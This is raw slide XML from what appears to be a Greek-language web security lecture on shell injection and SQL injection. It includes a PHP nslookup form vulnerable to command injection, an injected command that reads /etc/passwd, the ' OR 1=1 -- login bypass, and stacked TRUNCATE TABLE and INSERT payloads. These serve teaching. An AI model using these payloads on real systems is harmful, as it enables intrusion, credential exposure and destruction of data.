              <a:rPr b="0" i="0" lang="el" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk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2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>η εντολή που θα εκτελεστεί είναι:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'nslookup security-class.gr | cat /etc/passwd'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0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="269787" y="280975"/>
            <a:ext cx="6086475" cy="4581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3000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Πώς μπορούμε να επιτεθούμε στον παρακάτω κώδικα;</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373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  $host = '';</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  if (isset( $_POST['host'] ))</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    $host = $_POST['host'];</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  system("nslookup " . $host);</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form method="post"&gt;</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373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;select name="host"&gt;</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373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    &lt;option value="twitter.com"&gt;Twitter&lt;/option&gt;</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373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    &lt;option value="facebook.com"&gt;Facebook&lt;/option&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;/select&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  &lt;input type="submit" /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="373737"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Shape 15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Shell injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="154" name="Shape 154"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5990678" y="1306604"/>
            <a:ext cx="2572949" cy="1446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Αλλάζουμε τις POST παραμέτρους μέσω της javascript console και υποβάλλουμε τη φόρμα.</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Shape 16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Shell injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="Shape 161"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2236750" y="2373850"/>
            <a:ext cx="4759525" cy="2228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Redirection Operators </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;, &gt;&gt;, &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Ανακατευθύνουν το input ή το output στον server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="45720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Pipes </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>cat file1 | grep "string".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Επιτρέπουν την αλυσιδωτή σύνδεση πολλαπλών εντολών.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="45720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Inline commands </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;, $</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Ζητούν από τη γραμμή εντολών να εκτελέσει τις εντολές πριν από το ερωτηματικό και στη συνέχεια να εκτελέσει τις εντολές μετά από αυτό σε μια νέα γραμμή εντολών.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="45720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Logical Operators </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&amp;&amp;, ||</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Εκτελούν λογικές πράξεις στα δεδομένα της γραμμής εντολών.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Shape 16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The Command Line Interface (CLI)</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4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>SQL injections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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Shape 17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SQL (Structured Query Language) είναι μια γλώσσα που σχεδιάστηκε για τη διαχείριση δεδομένων σε μια βάση.</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Τα περισσότερα συστήματα βάσεων δεδομένων υλοποιούν το πρότυπο με διαφορετικό τρόπο, επαυξάνοντας το με δικές τους επεκτάσεις.</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SQL injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 18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Ο εισβολέας επιδιώκει μέσω της web εφαρμογής να επέμβει στα δεδομένα της βάσης.</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Μια ιδιαίτερα διαδεδομένη και επικίνδυνη επίθεση.</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Συναντάται και σε μη διαδικτυακές εφαρμογές.</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SQL injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="190" name="Shape 190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="61302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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Χτίζοντας ένα τυπικό username/password query:</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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$q = "SELECT * FROM users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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>      WHERE username = '" + $userName +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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>      AND password = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'" + $password + "'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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dk1"/>
              </a:buClr>
              <a:buSzPct val="25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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>το ερώτημα που θα εκτελεστεί στην βάση είναι:</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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * FROM users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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE username = 'Lydia</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk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AND password = 'methalymine';</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6678900" y="1340875"/>
            <a:ext cx="2007900" cy="24617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Αρχή λειτουργίας web εφαρμογών</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 4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Μια web εφαρμογή λαμβάνει HTTP requests και απαντά σύμφωνα με τις παραμέτρους του αιτήματος.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Shape 42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1855661" y="2435050"/>
            <a:ext cx="5432674" cy="2062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SQL injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Shape 19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Παρακάμπτουμε τις SQL συνθήκες εισάγοντας: ' OR 1=1 --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SELECT * FROM users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WHERE username = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>' OR 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>' AND password = ''</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk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H λογική συνθήκη </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el" sz="2000"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>username = ' OR 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el" sz="2000"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> είναι πάντοτε αληθής ανεξαρτήτως της τιμής του username.		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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					 				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115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Τα σύμβολα “--” εξασφαλίζουν ότι το υπόλοιπο SQL statement θα ερμηνευθεί σαν σχόλιο. Το password = '' δεν θα εκτελεστεί.</a:t>
            </a:r>
          </a:p>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SQL injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Shape 203"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="81531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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Πώς θα μπορούσαμε να σβήσουμε όλους τους χρήστες της βάσης και να ένα προσθέσουμε ένα μοναδικό χρήστη;</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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$q = "SELECT * FROM users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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>      WHERE username = '" + $userName +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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>      AND password = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'" + $password + "'</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;" </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="Shape 204"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6602400" y="1980725"/>
            <a:ext cx="2007900" cy="246174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Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * ... </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>TRUNCATE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> TABLE users;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="22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ct val="25000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * ... </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>; INSERT INTO users VALUES(“username”,”heisenberg”);</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="el" sz="2200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="DF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Shape 21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SQL injection</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pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="Shape 215"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
